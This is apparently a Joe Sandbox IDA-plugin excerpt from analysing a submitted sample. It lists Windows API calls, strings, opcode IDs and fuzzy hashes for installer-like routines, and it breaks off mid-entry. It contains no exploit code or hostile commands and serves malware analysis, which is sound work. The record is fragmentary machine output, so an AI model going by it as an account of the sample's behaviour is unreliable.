                                                                                                      • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                      • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                                      • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                      • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                                      APIs
                                                                                                        • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                      • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                                      Strings
                                                                                                      • NumRecs range exceeded, xrefs: 0045C396
                                                                                                      • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$BuffersFlush
                                                                                                      • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                      • API String ID: 3593489403-659731555
                                                                                                      • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                      • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                                      • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                      • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                                        • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                        • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                        • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                        • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                      • String ID: x|
                                                                                                      • API String ID: 296031713-1195792818
                                                                                                      • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                      • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                                      • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                      • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                                        • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                                        • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                        • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                        • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                        • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                        • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                        • Part of subcall function 004063C4: 6FB81CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                                        • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                                        • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                                        • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                        • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                        • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                                        • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                        • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                        • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                        • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                        • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                        • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                        • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                        • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                        • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                        • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                        • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                        • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                        • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                                        • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                        • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                        • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                                        • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                                        • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                      • String ID: Setup
                                                                                                      • API String ID: 504348408-3839654196
                                                                                                      • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                      • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                                      • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                      • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue
                                                                                                      • String ID: $=H
                                                                                                      • API String ID: 3660427363-3538597426
                                                                                                      • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                      • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                                      • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                      • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: .tmp
                                                                                                      • API String ID: 1375471231-2986845003
                                                                                                      • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                      • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                                      • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                      • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                                      APIs
                                                                                                        • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                        • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                        • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                        • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                        • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                        • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                        • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                        • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                        • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                                        • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                                        • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                        • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                                      • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                      • API String ID: 3869789854-2936008475
                                                                                                      • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                      • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                                      • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                      • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                                      APIs
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                      • API String ID: 3535843008-1113070880
                                                                                                      • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                      • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                                      • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                      • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                                        • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CreateFile
                                                                                                      • API String ID: 2528220319-823142352
                                                                                                      • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                      • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                                      • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                      • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                                      • API String ID: 71445658-2565060666
                                                                                                      • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                      • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                                      • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                      • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                                      APIs
                                                                                                        • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                                        • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                        • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                      • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                      • API String ID: 2906209438-2320870614
                                                                                                      • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                      • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                                      • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                      • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                        • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorLibraryLoadModeProc
                                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                      • API String ID: 2492108670-2683653824
                                                                                                      • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                      • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                                      • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                      • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                                      APIs
                                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2574300362-0
                                                                                                      • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                      • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                                      • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                      • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                                      APIs
                                                                                                      • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
